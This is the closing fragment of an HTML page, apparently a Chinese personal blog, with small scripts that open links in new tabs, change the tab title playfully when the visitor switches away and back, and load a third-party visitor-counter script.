        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 等主人回来啊~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>